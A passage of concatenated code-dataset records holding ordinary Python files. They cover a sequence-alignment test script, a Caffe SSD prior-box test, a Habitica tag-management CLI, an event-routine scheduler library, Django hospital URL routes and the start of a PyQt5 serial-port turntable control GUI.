aa=random.choice(list(gencode.values()))\n if aa=='_': aa='-'\n seqs[i].append(aa)\n return [\"\".join(seq) for seq in seqs]\n \n filetest=open(\"testMSA1.txt\",'w')\n filetest2=open(\"testMSA2.txt\",'w')\n for i, seq in enumerate(gen_aleat_seqs()):\n filetest.write(\">seq\"+str(i)+\"\\n\" + seq + \"\\n\")\n filetest.close()\n for i, seq in enumerate(gen_aleat_seqs()):\n filetest2.write(\">seq\"+str(i)+\"\\n\" + seq + \"\\n\")\n filetest2.close()\n msa1=MSA.MSA_cleaning(\"testMSA1.txt\", None)\n msa2=MSA.MSA_cleaning(\"testMSA2.txt\", None)\n tree1, dm1 = msa1.buildtree(msa1.alignment)\n tree2, dm2 = msa2.buildtree(msa2.alignment)\n tree1.ladderize()\n tree2.ladderize()\n tree1 = MSA.gettreetext(tree1)\n tree2 = MSA.gettreetext(tree2)\n cond_dm1 = msa1.cond_mat(dm1)\n cond_dm2 = msa2.cond_mat(dm2)\n pears = Mantel.MantelTest(cond_dm1, cond_dm2, randomizations=100)\n print(\"random tree 1 \\n\" + tree1)\n print(\"random tree 2 \\n\" +tree2)\n print(\"correlation \" + str(pears[0]))\n os.remove(\"testMSA1.txt\")\n os.remove(\"testMSA2.txt\")\n\n#test small amount of data in further experiment (1, 2 and 3)\ndef check_small(filename):\n pass\n \n#create a list of all the data files of a given folder \ndef listfile():\n liste = []\n for i in range(1,10): liste.append(\"s00\"+str(i)+\".align.1.msl\")\n for i in range(10, 100): liste.append(\"s0\"+str(i)+\".align.1.msl\")\n for i in range(100, 301): liste.append(\"s\"+str(i)+\".align.1.msl\")\n return liste\n\n#run the data test on all the files of a given folder\ndef runfolder(folderpath):\n liste = listfile()\n return [check_data(folderpath+'/'+name) for name in liste]\n\n#run all the test on all the files\ndef runall(genfolderpath):\n check_basic_synth()\n check_advance_synth()\n result=[]\n for namefolder in os.listdir(genfolderpath):\n result.append(runfolder(genfolderpath+'/'+namefolder))\n for folder in result:\n if False in folder:\n return \"Wrong data !\"\n return \"Data alright\"\n\nprint(runall(\"../../data\"))\n\n \n","sub_path":"results/controls/runall.py","file_name":"runall.py","file_ext":"py","file_size_in_byte":4950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534061425","text":"import sys\nimport numpy as np\nsys.path.insert(0, '/data2/obj_detect/ssd/caffe/python')\nimport caffe\nssd_pt = '/home/ky/obj_detect/ssd/py-ssd/models/debug_prior_layer/debug.prototxt'\nssd_md = '/home/ky/obj_detect/ssd/caffe/pretrain/models/VGGNet/VOC0712/SSD_300x300_ft/VGG_VOC0712_SSD_300x300_ft_iter_120000.caffemodel'\nssd_net = caffe.Net(ssd_pt, ssd_md, caffe.TEST)\nconv4_norm_blob = np.random.rand(1, 512, 38, 38).astype(np.float32)\ndata_blob = np.random.rand(1, 3, 300, 300).astype(np.float32)\n\nssd_net.blobs['data'].data[...] = data_blob\nssd_net.blobs['conv4_norm'].data[...] = conv4_norm_blob\n\nssd_net.forward()\nprior_data = ssd_net.blobs['conv4_3_norm_mbox_priorbox'].data\nnp.save('./prior.npy', prior_data)\n\n\n","sub_path":"caffe2/python/ssd_test/ssd_prior.py","file_name":"ssd_prior.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"85183878","text":"#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport os\nimport requests\nimport sys\nfrom collections import Counter\nimport time\n\n\nclass Debug(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n import pdb; pdb.set_trace()\n\n# MAIN\nparser = argparse.ArgumentParser(description=\"Dumps your tasks to a file user-tasks.json in the current directory\")\nparser.add_argument('-o', '--outfile',\n type=argparse.FileType('w'), default=\"user-tasks.json\",\n help='JSON data file (default: user-tasks.json)')\nparser.add_argument('-u', '--user-id',\n help='From https://habitica.com/#/options/settings/api\\n \\\n default: environment variable HAB_API_USER')\nparser.add_argument('-k', '--api-token',\n help='From https://habitica.com/#/options/settings/api\\n \\\n default: environment variable HAB_API_TOKEN')\nparser.add_argument('--baseurl',\n type=str, default=\"https://habitica.com\",\n help='API server (default: https://habitica.com)')\nparser.add_argument('--debug',\n action=Debug, nargs=0,\n help=argparse.SUPPRESS)\nparser.add_argument('-d', '--delete-tag',\n type=str)\nparser.add_argument('-a', '--add-tag',\n type=str)\nparser.add_argument('-t', '--task-id',\n type=str)\nargs = parser.parse_args()\nargs.baseurl += \"/api/v3/\"\n\ntry:\n if args.user_id is None:\n args.user_id = os.environ['HAB_API_USER']\nexcept KeyError:\n print(\"User ID must be set by the -u/--user-id option or by setting the environment variable 'HAB_API_USER'\")\n sys.exit(1)\n\ntry:\n if args.api_token is None:\n args.api_token = os.environ['HAB_API_TOKEN']\nexcept KeyError:\n print(\"API Token must be set by the -k/--api-token option or by setting the environment variable 'HAB_API_TOKEN'\")\n sys.exit(1)\n\nheaders = {\"x-api-user\": args.user_id, \"x-api-key\": args.api_token, \"Content-Type\": \"application/json\"}\nreq = requests.get(args.baseurl + \"tasks/user\", headers=headers)\n# with open(args.outfile, 'w') as f:\n#json.dump(req.json(), args.outfile, separators=(',', ':'), sort_keys=True)\nallTasks= req.json()['data']\npTag=\"0465135b-7652-4aac-8a15-9db5fc9af803\"\ncTag=\"48924274-1ba1-49ba-8dc5-48b0ff225d25\"\ncDelTag = []\ncHasTag = []\ncTasks = []\ncToTag = [] \npDelTag = []\npHasTag= []\npTasks = []\npToTag=[]\n\n\ndef DeleteTag(tasks,tag):\n for counter,item in enumerate(tasks, start=1):\n requests.delete(args.baseurl + \"tasks/\" + item + \"/tags/\" + tag, headers=headers)\n time.sleep(60/30)\n print(counter)\n\n\ndef AddTag(tasks,tag):\n for counter2, item in enumerate(tasks, start=1):\n requests.post(args.baseurl + \"tasks/\" + item + \"/tags/\" + tag, headers=headers)\n time.sleep(60/30)\n print(counter2)\n\ndef getList(theTasks,tag_e):\n list = []\n for task in theTasks:\n for tag in task['tags']:\n if tag == tag_e:\n list.append(task['id'])\n else:\n continue\n return list \n\n# Python code t get difference of two lists\n# Using set()\ndef Diff(li1, li2):\n return list(set(li1) - set(li2)) + list(set(li2) - set(li1))\n\ndef Differ(dict,list):\n newlist=[]\n for item in dict:\n if item['id'] not in list:\n newlist.append(item['id'])\n else: \n continue\n return(newlist)\n\n \nif args.task_id:\n if args.add_tag:\n print(\"Adding the tag on the task.\")\n requests.post(args.baseurl + \"tasks/\" + args.task_id + \"/tags/\" + args.add_tag, headers=headers)\n print(\"Done\")\n elif args.delete_tag:\n print(\"Deleting the tag on the task.\")\n requests.delete(args.baseurl + \"tasks/\" + args.task_id + \"/tags/\" + args.delete_tag, headers=headers)\n print(\"Done\")\n if args.delete_tag is None and args.add_tag is None:\n print(\"Add with the -/--add-tag or -d/--delete-tag the tag ID you want to add, delete or both to replace.\")\n \nelse:\n if args.add_tag and args.delete_tag:\n print(\"Custom action: replace tags in all tasks\")\n changeTags = []\n changeTags = getList(allTasks, args.delete_tag)\n print(f\"Replacing tag in {len(changeTags)} tasks.\")\n DeleteTag(changeTags,args.delete_tag)\n AddTag(changeTags,args.add_tag)\n print(\"Done\")\n elif args.add_tag is None and args.delete_tag:\n print(\"Custom action: delete tag\")\n deleteTags = []\n deleteTags = getList(allTasks, args.delete_tag)\n print(f\"Deleting tag in {len(deleteTags)} tasks.\")\n AddTag(deleteTags,args.delete_tag)\n print(\"Done\")\n elif args.add_tag and args.delete_tag is None:\n print(\"Add with the -a/--add-tag or -d/--delete-tag options the tag ID you want to add, delete, or both to replace. Add with -t/--task-id the task ID you want to tag. \")\n\n elif args.delete_tag is None and args.add_tag is None:\n print(\"Default action: add a tag to the challenge tasks and the no-challenge tasks\")\n for counter1, item in enumerate(allTasks, start=1):\n myTags = item['tags']\n task = {}\n task.update({'id': item['id'], \"tags\": item['tags']})\n if len(item['challenge']) != 0:\n cTasks.append(task)\n else:\n pTasks.append(task)\n\n pDelTag=getList(pTasks,cTag)\n pHasTag=getList(pTasks,pTag)\n pToTag=Differ(pTasks,pHasTag)\n cDelTag=getList(cTasks,pTag)\n cHasTag=getList(cTasks,cTag)\n cToTag=Differ(cTasks,cHasTag)\n\n print(f'TOTAL TASKS: {counter1}')\n print(f'CHALLENGE TASKS: {len(cTasks)} \\nWrong tag: {len(cDelTag)}\\tGood tag: {len(cHasTag)}\\tTo tag: {len(cToTag)}')\n print(f'PERSONAL TASKS: {len(pTasks)} \\nWrong tag: {len(pDelTag)}\\tGood tag: {len(pHasTag)}\\tTo tag: {len(pToTag)}')\n input(\"Press Enter to continue...\")\n\n print(\"Adding challenge tag to tasks...\")\n AddTag(cToTag,cTag)\n print(\"Done\")\n print(\"Deleting wrong tag in challenge tags...\")\n DeleteTag(cDelTag,pTag)\n print(\"Done\")\n print(\"Adding personal tag to tasks...\")\n AddTag(pToTag,pTag)\n print(\"Done\")\n print(\"Deleting wrong tag in personal tasks...\")\n DeleteTag(pDelTag,cTag)\n print(\"Done\")\n \n","sub_path":"replace_tags.py","file_name":"replace_tags.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"240544543","text":"'''\nCreated on 2015/6/16\n\n:author: hubo\n'''\nfrom __future__ import print_function, absolute_import, division \nimport sys\nfrom .core import QuitException, TimerEvent, SystemControlEvent\nfrom .event import Event, withIndices\n\nclass EventHandler(object):\n '''\n Runnable with an event handler model. \n '''\n def __init__(self, scheduler = None, daemon = False):\n self.handlers = dict()\n self.scheduler = scheduler\n self.daemon = daemon\n self.registered = False\n def bind(self, scheduler):\n self.scheduler = scheduler\n def __iter__(self):\n '''\n Keep it like a iterator. Not very useful.\n '''\n return self\n def next(self):\n '''\n Keep it like a iterator. Not very useful.\n '''\n self.send(None)\n def __next__(self):\n '''\n Python 3 next\n '''\n self.send(None)\n def send(self, etup):\n '''\n Handle events\n '''\n return self.handlers[etup[1]](etup[0], self.scheduler)\n def _setDaemon(self):\n if not self.registered:\n self.registered = True\n self.scheduler.setDaemon(self, self.daemon)\n def registerHandler(self, matcher, handler):\n '''\n Register self to scheduler\n '''\n self.handlers[matcher] = handler\n self.scheduler.register((matcher,), self)\n self._setDaemon()\n def unregisterHandler(self, matcher):\n self.scheduler.unregister((matcher,), self)\n del self.handlers[matcher]\n def unregisterAllHandlers(self):\n self.scheduler.unregister(tuple(self.handlers.keys()), self)\n self.handlers.clear()\n def registerAllHandlers(self, handlerDict):\n '''\n Register self to scheduler\n '''\n self.handlers.update(handlerDict)\n if hasattr(handlerDict, 'keys'):\n self.scheduler.register(handlerDict.keys(), self)\n else:\n self.scheduler.register(tuple(h[0] for h in handlerDict), self)\n self._setDaemon()\n def close(self):\n self.scheduler.unregisterall(self)\n self.registered = False\n def registerExceptionHandler(self, handler):\n self.exceptionHandler = handler\n def registerQuitHandler(self, handler):\n self.quitHandler = handler\n def throw(self, typ, val = None, tb = None):\n if val is None:\n if isinstance(typ, type):\n val = typ()\n else:\n val = typ\n typ = type(val)\n if isinstance(val, QuitException):\n self.quitHandler(self.scheduler)\n else:\n self.exceptionHandler(val, self.scheduler)\n def exceptionHandler(self, val, scheduler):\n raise val\n def quitHandler(self, scheduler):\n raise StopIteration\n\n@withIndices('type', 'routine')\nclass RoutineControlEvent(Event):\n canignore = False\n ASYNC_START = 'asyncstart'\n DELEGATE_FINISHED = 'delegatefinished'\n WAIT = 'wait'\n\nclass IllegalMatchersException(Exception):\n pass\n\nclass generatorwrapper(object):\n '''\n Default __repr__ of a generator is not readable, use a wrapper to improve the readability\n '''\n def __init__(self, run, name = 'iterator', classname = 'routine'):\n self.run = run\n self.name = name\n self.classname = classname\n def __iter__(self):\n return self.run\n def next(self):\n return next(self.run)\n def __next__(self):\n return next(self.run)\n def send(self, arg):\n return self.run.send(arg)\n def throw(self, typ, val = None, tb = None):\n return self.run.throw(typ, val, tb)\n def __repr__(self, *args, **kwargs):\n try:\n iterator = self.run.gi_frame.f_locals[self.name]\n try:\n return '<%s %r of %r at 0x%016X>' % (self.classname, iterator,\n iterator.gi_frame.f_locals['self'],\n id(iterator))\n except:\n return '<%s %r at 0x%016X>' % (self.classname, iterator, id(iterator))\n except:\n return repr(self.run)\n def close(self):\n return self.run.close()\n\ndef Routine(iterator, scheduler, asyncStart = True, container = None, manualStart = False, daemon = False):\n def run():\n iterself, re = yield\n rcMatcher = RoutineControlEvent.createMatcher(RoutineControlEvent.ASYNC_START, iterself)\n if manualStart:\n yield\n try:\n if asyncStart:\n scheduler.register((rcMatcher,), iterself)\n (event, m) = yield\n event.canignore = True\n scheduler.unregister((rcMatcher,), iterself)\n if container is not None:\n container.currentroutine = iterself\n if daemon:\n scheduler.setDaemon(iterself, True)\n matchers = next(iterator)\n try:\n scheduler.register(matchers, iterself)\n except:\n iterator.throw(IllegalMatchersException(matchers))\n raise\n while True:\n try:\n etup = yield\n except:\n #scheduler.unregister(matchers, iterself)\n lmatchers = matchers\n t,v,tr = sys.exc_info() # @UnusedVariable\n if container is not None:\n container.currentroutine = iterself\n matchers = iterator.throw(t,v)\n else:\n #scheduler.unregister(matchers, iterself)\n lmatchers = matchers\n if container is not None:\n container.event = etup[0]\n container.matcher = etup[1]\n if container is not None:\n container.currentroutine = iterself\n matchers = iterator.send(etup)\n try:\n scheduler.unregister(set(lmatchers).difference(matchers), iterself)\n scheduler.register(set(matchers).difference(lmatchers), iterself)\n except:\n iterator.throw(IllegalMatchersException(matchers))\n raise\n finally:\n if asyncStart:\n re.canignore = True\n scheduler.ignore(rcMatcher)\n if container is not None:\n container.currentroutine = iterself\n iterator.close()\n scheduler.unregisterall(iterself)\n r = generatorwrapper(run())\n next(r)\n if asyncStart:\n re = RoutineControlEvent(RoutineControlEvent.ASYNC_START, r)\n r.send((r, re))\n waiter = scheduler.send(re)\n if waiter is not None:\n # This should not happen regularly\n def latencyStart(w):\n while w:\n yield (w,)\n w = scheduler.send(re)\n Routine(latencyStart(waiter), scheduler, False)\n else:\n r.send((r, None))\n return r\n\nclass RoutineException(Exception):\n def __init__(self, matcher, event):\n Exception.__init__(self, matcher, event)\n self.matcher = matcher\n self.event = event\n\nclass MultipleException(Exception):\n def __init__(self, exceptions):\n Exception.__init__(self, '%d exceptions occurs in parallel execution' % (len(exceptions),) \\\n + ': ' + repr(exceptions[0]) + ', ...')\n self.exceptions = exceptions\n\nclass RoutineContainer(object):\n def __init__(self, scheduler = None, daemon = False):\n self.scheduler = scheduler\n self.daemon = daemon\n def bind(self, scheduler):\n self.scheduler = scheduler\n def main(self):\n raise NotImplementedError\n def start(self, asyncStart = False):\n r = Routine(self.main(), self.scheduler, asyncStart, self, True, self.daemon)\n self.mainroutine = r\n try:\n next(r)\n except StopIteration:\n pass\n return r\n def subroutine(self, iterator, asyncStart = True, name = None, daemon = False):\n r = Routine(iterator, self.scheduler, asyncStart, self, True, daemon)\n if name is not None:\n setattr(self, name, r)\n # Call subroutine may change the currentroutine, we should restore it\n currentroutine = getattr(self, 'currentroutine', None)\n try:\n next(r)\n except StopIteration:\n pass\n self.currentroutine = currentroutine\n return r\n def terminate(self, routine = None):\n if routine is None:\n routine = self.mainroutine\n routine.close()\n def close(self):\n self.terminate()\n def waitForSend(self, event):\n '''\n Can call without delegate\n '''\n waiter = self.scheduler.send(event)\n while waiter:\n yield (waiter,)\n waiter = self.scheduler.send(event)\n def waitWithTimeout(self, timeout, *matchers):\n if timeout is None:\n yield matchers\n self.timeout = False\n else:\n th = self.scheduler.setTimer(timeout)\n try:\n tm = TimerEvent.createMatcher(th)\n yield tuple(matchers) + (tm,)\n if self.matcher is tm:\n self.timeout = True\n else:\n self.timeout = False\n finally:\n self.scheduler.cancelTimer(th)\n def executeWithTimeout(self, timeout, subprocess):\n if timeout is None:\n for m in subprocess:\n yield m\n self.timeout = False\n else:\n th = self.scheduler.setTimer(timeout)\n try:\n tm = TimerEvent.createMatcher(th)\n try:\n for m in self.withException(subprocess, tm):\n yield m\n self.timeout = False\n except RoutineException as exc:\n if exc.matcher is tm:\n self.timeout = True\n else:\n raise\n finally:\n self.scheduler.cancelTimer(th)\n subprocess.close()\n def doEvents(self):\n '''\n Can call without delegate\n '''\n self.scheduler.wantContinue()\n cm = SystemControlEvent.createMatcher(SystemControlEvent.CONTINUE)\n yield (cm,)\n def withException(self, subprocess, *matchers):\n try:\n for m in subprocess:\n yield tuple(m) + tuple(matchers)\n if self.matcher in matchers:\n raise RoutineException(self.matcher, self.event)\n finally:\n subprocess.close()\n def withCallback(self, subprocess, callback, *matchers):\n try:\n for m in subprocess:\n while True:\n yield tuple(m) + tuple(matchers)\n if self.matcher in matchers:\n callback(self.event, self.matcher)\n else:\n break\n finally:\n subprocess.close()\n \n def waitForEmpty(self, queue):\n '''\n Can call without delegate\n '''\n while True:\n m = queue.waitForEmpty()\n if m is None:\n break\n else:\n yield (m,)\n def waitForAll(self, *matchers):\n eventdict = {}\n eventlist = []\n self.scheduler.register(matchers, self.currentroutine)\n try:\n ms = len(matchers)\n while ms:\n yield ()\n self.scheduler.unregister((self.matcher,), self.currentroutine)\n ms -= 1\n eventlist.append(self.event)\n eventdict[self.matcher] = self.event\n self.eventlist = eventlist\n self.eventdict = eventdict\n except:\n self.scheduler.unregister(matchers, self.currentroutine)\n raise\n def waitForAllToProcess(self, *matchers):\n eventdict = {}\n eventlist = []\n self.scheduler.register(matchers, self.currentroutine)\n try:\n ms = len(matchers)\n while ms:\n yield ()\n self.event.canignore = True\n self.scheduler.unregister((self.matcher,), self.currentroutine)\n ms -= 1\n eventlist.append(self.event)\n eventdict[self.matcher] = self.event\n self.eventlist = eventlist\n self.eventdict = eventdict\n except:\n self.scheduler.unregister(matchers, self.currentroutine)\n raise\n def waitForAllEmpty(self, *queues):\n matchers = [m for m in (q.waitForEmpty() for q in queues) if m is not None]\n while matchers:\n for m in self.waitForAll(*matchers):\n yield m\n matchers = [m for m in (q.waitForEmpty() for q in queues) if m is not None]\n def syscall_noreturn(self, func):\n '''\n Can call without delegate\n '''\n matcher = self.scheduler.syscall(func)\n while not matcher:\n e = RoutineControlEvent(RoutineControlEvent.WAIT, self.currentroutine)\n e.canignore = True\n for m in self.waitForSend(e):\n yield m\n yield (RoutineControlEvent.createMatcher(RoutineControlEvent.WAIT, self.currentroutine),)\n matcher = self.scheduler.syscall(func)\n yield (matcher,)\n def syscall(self, func, ignoreException = False):\n for m in self.syscall_noreturn(func):\n yield m\n if hasattr(self.event, 'exception'):\n raise self.event.exception[1]\n else:\n self.retvalue = self.event.retvalue\n def delegate(self, subprocess):\n '''\n Run a subprocess without container support\n Many subprocess assume itself running in a specified container, it uses container reference\n like self.events. Calling the subprocess in other containers will fail.\n With delegate, you can call a subprocess in any container (or without a container):\n for m in c.delegate(c.someprocess()):\n yield m\n '''\n def delegateroutine():\n try:\n for m in subprocess:\n yield m\n except:\n typ, val, tb = sys.exc_info()\n e = RoutineControlEvent(RoutineControlEvent.DELEGATE_FINISHED, self.currentroutine)\n e.canignore = True\n for m in self.waitForSend(e):\n yield m\n raise\n else:\n e = RoutineControlEvent(RoutineControlEvent.DELEGATE_FINISHED, self.currentroutine)\n e.canignore = True\n for m in self.waitForSend(e):\n yield m\n r = self.subroutine(generatorwrapper(delegateroutine(), 'subprocess', 'delegate'), True)\n finish = RoutineControlEvent.createMatcher(RoutineControlEvent.DELEGATE_FINISHED, r)\n # As long as we do not use self.event to read the event, we are safe to receive them from other contaiers\n yield (finish,)\n def beginDelegateOther(self, subprocess, container, retnames = ('retvalue',)):\n '''\n Start the delegate routine, but do not wait for result, instead returns a matcher in self.retvalue.\n Useful for advanced delegates (e.g. delegate multiple subprocesses in the same time).\n This is NOT a generator.\n :param subprocess: a subroutine\n :param container: container in which to start the routine\n :param retnames: get return values from keys\n :returns: (matcher, routine) where matcher is a event matcher to get the delegate result, routine is the created routine\n '''\n def delegateroutine():\n try:\n for m in subprocess:\n yield m\n except:\n typ, val, tb = sys.exc_info()\n e = RoutineControlEvent(RoutineControlEvent.DELEGATE_FINISHED, container.currentroutine, exception = val)\n e.canignore = True\n for m in container.waitForSend(e):\n yield m\n raise\n else:\n e = RoutineControlEvent(RoutineControlEvent.DELEGATE_FINISHED, container.currentroutine,\n result = tuple(getattr(container, n, None) for n in retnames))\n e.canignore = True\n for m in container.waitForSend(e):\n yield m\n r = container.subroutine(generatorwrapper(delegateroutine(), 'subprocess', 'delegate'), True)\n return (RoutineControlEvent.createMatcher(RoutineControlEvent.DELEGATE_FINISHED, r), r)\n def delegateOther(self, subprocess, container, retnames = ('retvalue',)):\n '''\n Another format of delegate allows delegate a subprocess in another container, and get some returning values\n the subprocess is actually running in 'container'.\n for m in self.delegateOther(c.method(), c):\n yield m\n ret = self.retvalue\n '''\n finish, _ = self.beginDelegateOther(subprocess, container, retnames)\n yield (finish,)\n if hasattr(self.event, 'exception'):\n raise self.event.exception\n for n, v in zip(retnames, self.event.result):\n setattr(self, n, v)\n def executeAll(self, subprocesses, container = None, retnames = ('retvalue',), forceclose = True):\n '''\n Execute all subprocesses and get the return values. Return values are in self.retvalue.\n :param subprocesses: sequence of subroutines (generators)\n :param container: if specified, run subprocesses in another container.\n :param retnames: get return value from container.(name) for each name in retnames.\n :param forceclose: force close the routines on exit, so all the subprocesses are terminated\n on timeout if used with executeWithTimeout\n :returns: a list of tuples, one for each subprocess, with value of retnames inside:\n [('retvalue1',),('retvalue2',),...]\n '''\n if container is None:\n container = self\n delegates = [self.beginDelegateOther(p, container, retnames) for p in subprocesses]\n matchers = [d[0] for d in delegates]\n try:\n for m in self.waitForAll(*matchers):\n yield m\n events = [self.eventdict[m] for m in matchers]\n exceptions = [e.exception for e in events if hasattr(e, 'exception')]\n if exceptions:\n if len(exceptions) == 1:\n raise exceptions[0]\n else:\n raise MultipleException(exceptions)\n self.retvalue = [e.result for e in events]\n finally:\n if forceclose:\n for d in delegates:\n try:\n container.terminate(d[1])\n except:\n pass\n","sub_path":"vlcp/event/runnable.py","file_name":"runnable.py","file_ext":"py","file_size_in_byte":19163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522774373","text":"from django.urls import include, path\nfrom django.views.generic import RedirectView\nfrom . import views\n\nurlpatterns = [\n path('dashboard/', views.dashboard, name='dashboard'),\n path('about/', views.about, name='about'),\n path('contact/', views.contact, name='contact'),\n \n # Doctor Records\n path('view_doctor/', views.view_doctor, name='view_doctor'),\n path('add_doctor/', views.add_doctor, name='add_doctor'),\n path('delete_doctor//', views.delete_doctor, name='delete_doctor'),\n\n # Patient Records\n path('view_patient/', views.view_patient, name='view_patient'),\n path('add_patient/', views.add_patient, name='add_patient'),\n path('delete_patient//', views.delete_patient, name='delete_patient'),\n\n # Appointment\n path('view_appointment/', views.view_appointment, name='view_appointment'),\n path('add_appointment/', views.add_appointment, name='add_appointment'),\n path('delete_appointment//', views.delete_appointment, name='delete_appointment'),\n\n path('', RedirectView.as_view(url='dashboard/')),\n]","sub_path":"hospital/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"374402095","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: Lian Yue\n\nimport sys\nfrom Pro import Ui_MainWindow\nimport serial\nimport qtawesome\nimport serial.tools.list_ports\nfrom PyQt5.QtCore import QTimer\n# from PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QSlider, QMessageBox\n# from PyQt5.QtWidgets import *\n# from PyQt5.QtGui import *\n# from PyQt5 import QtGui\nimport function_file\nimport numpy as np\nimport image\n\n#解决打包时递归超过最大深度问题\n# sys.setrecursionlimit(100000)\n\n# from function_file import data_send_function\n\n\n''' \n参考博客\nhttps://www.cnblogs.com/ubuntu1987/archive/2004/01/13/12191633.html\nhttps://www.pythonf.cn/read/108311\nhttps://blog.csdn.net/liuxf196921/article/details/88165399\nhttps://www.jianshu.com/p/d4c0169a28db\nhttps://blog.csdn.net/qq_44880255/article/details/106957320?utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2~all~first_rank_v2~rank_v28-3-106957320.nonecase&utm_term=pyqt%20qslider%E5%88%BB%E5%BA%A6%E6%A0%B7%E5%BC%8F&spm=1000.2123.3001.4430\nhttps://blog.csdn.net/fhqlongteng/article/details/78535393\nhttps://zhuanlan.zhihu.com/p/100798858\nhttps://blog.csdn.net/weixin_40796925/article/details/107733966\nhttps://blog.csdn.net/qq_41590417/article/details/80477990\nhttps://blog.csdn.net/weixin_40796925/article/details/107730799 建立 PlotWidget 控件\nhttps://blog.csdn.net/qq_40529853/article/details/100576791 体积问题\n'''\n\n\nclass Pyqt5Serial(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super(Pyqt5Serial, self).__init__()\n self.setupUi(self)\n self.init()\n self.setWindowTitle(\"转台上位机V3.0\")\n self.ser = serial.Serial()\n # self.port_check()\n # spin_icon = qtawesome.icon('fa.star', color='darkolivegreen')\n # spin_icon = QtGui.QIcon(':/pic.png')\n spin_icon = qtawesome.icon('fa.star', color='darkolivegreen')\n self.setWindowIcon(spin_icon)\n # 刷新一下串口的列表\n self.refresh()\n\n # Dial表盘\n self.dial.setNotchesVisible(True) # 设置刻度\n self.dial.setPageStep(0.01) # 翻页步长\n # self.dial.setNotchTarget(0.01)\n self.dial.setNotchTarget(5) # 设置刻度密度,即单位刻度所代表的大小\n self.dial.setRange(-180, 180) # 设置范围\n self.dial.setWrapping(True) # 刻度不留缺口\n\n # slider垂直滑动条\n # 设置最小值\n self.verticalSlider.setMinimum(-180)\n # 设置最大值\n self.verticalSlider.setMaximum(180)\n # 设置步长\n self.verticalSlider.setSingleStep(0.01)\n # 设置当前值\n self.verticalSlider.setValue(0)\n # 设置在垂直滑块左侧绘制刻度线\n self.verticalSlider.setTickPosition(QSlider.TicksLeft)\n # 设置刻度间隔\n self.verticalSlider.setTickInterval(0.01)\n\n # 校验位\n lit_on = [0x07, 0x08, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]\n lit_off = [0x07, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]\n lit_lock = [0x07, 0x08, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]\n\n t_on = None\n for i in range(len(lit_on)):\n if i:\n t_on ^= lit_on[i]\n else:\n t_on = lit_on[i] ^ 0\n\n t_off = None\n for i in range(len(lit_off)):\n if i:\n t_off ^= lit_off[i]\n else:\n t_off = lit_off[i] ^ 0\n\n t_lock = None\n for i in range(len(lit_lock)):\n if i:\n t_lock ^= lit_lock[i]\n else:\n t_lock = lit_lock[i] ^ 0\n\n self.active_button = ''\n self.POWER_ON = '55 AA 07 08 80 00 00 00 00 00 00 00 ' + hex(t_on)[2:].zfill(2) + ' F0'\n self.POWER_OFF = '55 AA 07 08 00 00 00 00 00 00 00 00 ' + hex(t_off)[2:].zfill(2) + ' F0'\n self.LOCK = '55 AA 07 08 10 00 00 00 00 00 00 00 ' + hex(t_lock)[2:].zfill(2) + ' F0'\n self.READ_DATA = '55 AA 07 08 00 FF 00 00 00 00 00 00 00 F0'\n # self.SERVO_OFF = '55 AA 07 08 01 01 00 00 00 00 00 00 00 00 F0' 伺服关闭\n\n\n # 绘图\n # self.plotWidget_ted = PlotWidget(self)\n # self.plotWidget_ted.plot([1, 2, 3, 4, 5], pen='r', symbol='o')\n # self.widget.addAction(self.plotWidget_ted)\n # 生成 300 个正态分布的随机数\n # self.data1 = np.random.normal(size=10)\n\n\n def init(self):\n\n # 打开串口按钮\n self.btn_open.clicked.connect(self.port_open)\n # 关闭串口按钮\n self.btn_close.clicked.connect(self.port_close)\n # 发送数据按钮\n # self.btn_send.clicked.connect(self.data_send)\n\n # self.radioButton1.setChecked(True)\n self.radioButton1.toggled.connect(self.button_active)\n self.radioButton2.toggled.connect(self.button_active)\n self.radioButton_w.toggled.connect(self.button_active)\n self.pushButton_on.clicked.connect(self.button_active_else)\n self.pushButton_off.clicked.connect(self.button_active_else)\n self.pushButton_lock.clicked.connect(self.button_active_else)\n # self.radioButton6.toggled.connect(self.button_active_else)\n self.btn_open.clicked.connect(self.data_receive)\n self.verticalSlider.valueChanged.connect(self.valueChange_slider)\n self.dial.valueChanged.connect(self.valueChange_dial)\n # 刷新串口外设按钮\n self.pushButton_flash.clicked.connect(self.refresh)\n\n # 定时器接收数据\n self.timer = QTimer(self)\n self.timer.timeout.connect(self.data_receive)\n # self.groupBox_2.plot([1, 2, 3, 4, 5], pen='r', symbol='o')\n\n # self.timer_send = QTimer()\n self.data1 = np.zeros(200)\n # print(self.data1)\n # self.data2 = np.random.normal(size=10)\n self.data2 = np.zeros(200)\n self.data3 = np.zeros(200)\n self.data4 = np.zeros(200)\n self.data5 = np.zeros(200)\n self.data6 = np.zeros(200)\n self.data7 = np.zeros(200)\n self.data8 = np.zeros(200)\n self.data9 = np.zeros(200)\n self.data10 = np.zeros(200)\n\n self.curve1 = self.plotWidget_ted_1.plot(self.data1, pen=\"r\", name=\"mode1\")\n self.curve2 = self.plotWidget_ted_2.plot(self.data2, pen=\"r\", name=\"mode2\")\n self.curve3 = self.plotWidget_ted_3.plot(self.data3, pen=\"r\", name=\"mode3\")\n self.curve4 = self.plotWidget_ted_4.plot(self.data4, pen=\"r\", name=\"mode4\")\n self.curve5 = self.plotWidget1.plot(self.data5, pen=\"w\", name=\"mode5\")\n self.curve6 = self.plotWidget1.plot(self.data6, pen=\"g\", name=\"mode6\")\n self.curve7 = 